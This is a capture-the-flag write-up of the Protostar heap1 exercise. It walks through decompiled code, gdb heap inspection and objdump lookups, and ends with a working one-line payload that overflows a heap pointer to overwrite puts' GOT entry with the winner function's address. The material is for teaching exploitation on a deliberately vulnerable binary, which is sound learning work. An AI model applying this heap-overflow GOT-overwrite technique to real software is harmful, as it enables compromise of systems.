exploit_exercises protostar heap 1
Let's take a look at the binary. Also this challenge is a bit different from the others, it's from the protostar wargame and the goal is to call the winner function (not pop a shell). Also this isn't the original binary, I recompiled it:
$ file heap1
heap1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=0840a5076b50649a07ba60e78144b2bf30297c92, not stripped
$ pwn checksec heap1
[*] '/Hackery/pod/modules/heap_overflow/protostarHeap1/heap1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
$ ./heap1
Segmentation fault (core dumped)
$ ./heap1 15935728
Segmentation fault (core dumped)
$ ./heap1 15935728 75395128
and that's a wrap folks!
So we are dealing with a 32 bit binary with no PIE or RELRO. It also expects two inputs passed as arguments to the program. When we take a look at the main function in Ghidra, we see this:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
undefined4 main(undefined4 argc,int argv)
{
undefined4 *chunk0;
void *ptr0;
undefined4 *chunk1;
void *ptr1;
chunk0 = (undefined4 *)malloc(8);
*chunk0 = 1;
ptr0 = malloc(8);
*(void **)(chunk0 + 1) = ptr0;
chunk1 = (undefined4 *)malloc(8);
*chunk1 = 2;
ptr1 = malloc(8);
*(void **)(chunk1 + 1) = ptr1;
strcpy((char *)chunk0[1],*(char **)(argv + 4));
strcpy((char *)chunk1[1],*(char **)(argv + 8));
puts("and that\'s a wrap folks!");
return 0;
}
So we can see that this program starts off by allocating two heap structures. The structure of those structures is this:
0x4: integer (either 1, or 2)
0x8: ptr to eight byte space allocated with malloc
The bug here is the two strcpy calls. They aren't checking if the space it is writing to is big enough to hold the data, so we have an overflow. Taking a look at how the data is laid out in the heap in gdb, we see this:
gef➤ disas main
Dump of assembler code for function main:
0x080484e1 <+0>: lea ecx,[esp+0x4]
0x080484e5 <+4>: and esp,0xfffffff0
0x080484e8 <+7>: push DWORD PTR [ecx-0x4]
0x080484eb <+10>: push ebp
0x080484ec <+11>: mov ebp,esp
0x080484ee <+13>: push esi
0x080484ef <+14>: push ebx
0x080484f0 <+15>: push ecx
0x080484f1 <+16>: sub esp,0x1c
0x080484f4 <+19>: call 0x80483f0 <__x86.get_pc_thunk.bx>
0x080484f9 <+24>: add ebx,0x1b07
0x080484ff <+30>: mov esi,ecx
0x08048501 <+32>: sub esp,0xc
0x08048504 <+35>: push 0x8
0x08048506 <+37>: call 0x8048360 <malloc@plt>
0x0804850b <+42>: add esp,0x10
0x0804850e <+45>: mov DWORD PTR [ebp-0x20],eax
0x08048511 <+48>: mov eax,DWORD PTR [ebp-0x20]
0x08048514 <+51>: mov DWORD PTR [eax],0x1
0x0804851a <+57>: sub esp,0xc
0x0804851d <+60>: push 0x8
0x0804851f <+62>: call 0x8048360 <malloc@plt>
0x08048524 <+67>: add esp,0x10
0x08048527 <+70>: mov edx,eax
0x08048529 <+72>: mov eax,DWORD PTR [ebp-0x20]
0x0804852c <+75>: mov DWORD PTR [eax+0x4],edx
0x0804852f <+78>: sub esp,0xc
0x08048532 <+81>: push 0x8
0x08048534 <+83>: call 0x8048360 <malloc@plt>
0x08048539 <+88>: add esp,0x10
0x0804853c <+91>: mov DWORD PTR [ebp-0x1c],eax
0x0804853f <+94>: mov eax,DWORD PTR [ebp-0x1c]
0x08048542 <+97>: mov DWORD PTR [eax],0x2
0x08048548 <+103>: sub esp,0xc
0x0804854b <+106>: push 0x8
0x0804854d <+108>: call 0x8048360 <malloc@plt>
0x08048552 <+113>: add esp,0x10
0x08048555 <+116>: mov edx,eax
0x08048557 <+118>: mov eax,DWORD PTR [ebp-0x1c]
0x0804855a <+121>: mov DWORD PTR [eax+0x4],edx
0x0804855d <+124>: mov eax,DWORD PTR [esi+0x4]
0x08048560 <+127>: add eax,0x4
0x08048563 <+130>: mov edx,DWORD PTR [eax]
0x08048565 <+132>: mov eax,DWORD PTR [ebp-0x20]
0x08048568 <+135>: mov eax,DWORD PTR [eax+0x4]
0x0804856b <+138>: sub esp,0x8
0x0804856e <+141>: push edx
0x0804856f <+142>: push eax
0x08048570 <+143>: call 0x8048350 <strcpy@plt>
0x08048575 <+148>: add esp,0x10
0x08048578 <+151>: mov eax,DWORD PTR [esi+0x4]
0x0804857b <+154>: add eax,0x8
0x0804857e <+157>: mov edx,DWORD PTR [eax]
0x08048580 <+159>: mov eax,DWORD PTR [ebp-0x1c]
0x08048583 <+162>: mov eax,DWORD PTR [eax+0x4]
0x08048586 <+165>: sub esp,0x8
0x08048589 <+168>: push edx
0x0804858a <+169>: push eax
0x0804858b <+170>: call 0x8048350 <strcpy@plt>
0x08048590 <+175>: add esp,0x10
0x08048593 <+178>: sub esp,0xc
0x08048596 <+181>: lea eax,[ebx-0x19ab]
0x0804859c <+187>: push eax
0x0804859d <+188>: call 0x8048370 <puts@plt>
0x080485a2 <+193>: add esp,0x10
0x080485a5 <+196>: mov eax,0x0
0x080485aa <+201>: lea esp,[ebp-0xc]
0x080485ad <+204>: pop ecx
0x080485ae <+205>: pop ebx
0x080485af <+206>: pop esi
0x080485b0 <+207>: pop ebp
0x080485b1 <+208>: lea esp,[ecx-0x4]
0x080485b4 <+211>: ret
End of assembler dump.
gef➤ b *main+175
Breakpoint 1 at 0x8048590
gef➤ r 1593572 7539512
Starting program: /Hackery/pod/modules/heap_overflow/protostarHeap1/heap1 1593572 7539512
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0x0804b190 → "7539512"
$ebx : 0x0804a000 → 0x08049f14 → 0x00000001
$ecx : 0xffffd2f5 → "7539512"
$edx : 0x0804b190 → "7539512"
$esp : 0xffffd010 → 0x0804b190 → "7539512"
$ebp : 0xffffd048 → 0x00000000
$esi : 0xffffd060 → 0x00000003
$edi : 0x0
$eip : 0x08048590 → <main+175> add esp, 0x10
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd010│+0x0000: 0x0804b190 → "7539512" ← $esp
0xffffd014│+0x0004: 0xffffd2f5 → "7539512"
0xffffd018│+0x0008: 0x00000000
0xffffd01c│+0x000c: 0x080484f9 → <main+24> add ebx, 0x1b07
0xffffd020│+0x0010: 0xf7faf3fc → 0xf7fb0200 → 0x00000000
0xffffd024│+0x0014: 0x00000000
0xffffd028│+0x0018: 0x0804b160 → 0x00000001
0xffffd02c│+0x001c: 0x0804b180 → 0x00000002
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
0x8048587 <main+166> in al, dx
0x8048588 <main+167> or BYTE PTR [edx+0x50], dl
0x804858b <main+170> call 0x8048350 <strcpy@plt>
→ 0x8048590 <main+175> add esp, 0x10
0x8048593 <main+178> sub esp, 0xc
0x8048596 <main+181> lea eax, [ebx-0x19ab]
0x804859c <main+187> push eax
0x804859d <main+188> call 0x8048370 <puts@plt>
0x80485a2 <main+193> add esp, 0x10
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "heap1", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x8048590 → main()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Breakpoint 1, 0x08048590 in main ()
gef➤ search-pattern 1593572
[+] Searching '1593572' in memory
[+] In '[heap]'(0x804b000-0x806d000), permission=rw-
0x804b170 - 0x804b177 → "1593572"
[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
0xffffd2ed - 0xffffd2f4 → "1593572"
gef➤ search-pattern 0x0804b170
[+] Searching '0x0804b170' in memory
[+] In '[heap]'(0x804b000-0x806d000), permission=rw-
0x804b164 - 0x804b174 → "\x70\xb1\x04\x08[...]"
[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
0xffffd000 - 0xffffd010 → "\x70\xb1\x04\x08[...]"
gef➤ x/20w 0x804b160
0x804b160: 0x00000001 0x0804b170 0x00000000 0x00000011
0x804b170: 0x33393531 0x00323735 0x00000000 0x00000011
0x804b180: 0x00000002 0x0804b190 0x00000000 0x00000011
0x804b190: 0x39333537 0x00323135 0x00000000 0x00021e69
0x804b1a0: 0x00000000 0x00000000 0x00000000 0x00000000
So we can see that our first input begins at 0x804b170. We can also see that the second pointer that is written to is at 0x804b184. This leaves us with a 0x804b184 - 0x804b170 = 20 byte difference. Here is the plan. With the first strcpy call we will overwrite the pointer at 0x0804b190 by inputting 20 bytes, plus a new pointer. Then with the second write, we will be able to write a value we want where we want to. Now is just the question of where to write it.
Since RELRO isn't enabled, we can write to the got table. This will make it so when it tries to call one function, it will actually call another. Looking at the disassembly we see that puts is called after the strcpy calls so that would probably be a good target. We can get it's got table entry (no PIE so we don't need an infoleak here) with objdump:
$ objdump -R heap1 | grep puts
0804a018 R_386_JUMP_SLOT puts@GLIBC_2.0
Now instead of executing puts, we can just execute the winner function instead. We can also find it's address using objdump:
$ objdump -D heap1 | grep winner
080484b6 <winner>:
With that, we have everything we need for our exploit:
$ ./heap1 `python -c 'print "0"*20 + "\x18\xa0\x04\x08" + " " + "\xb6\x84\x04\x08"'`
and we have a winner
Just like that, we got the flag!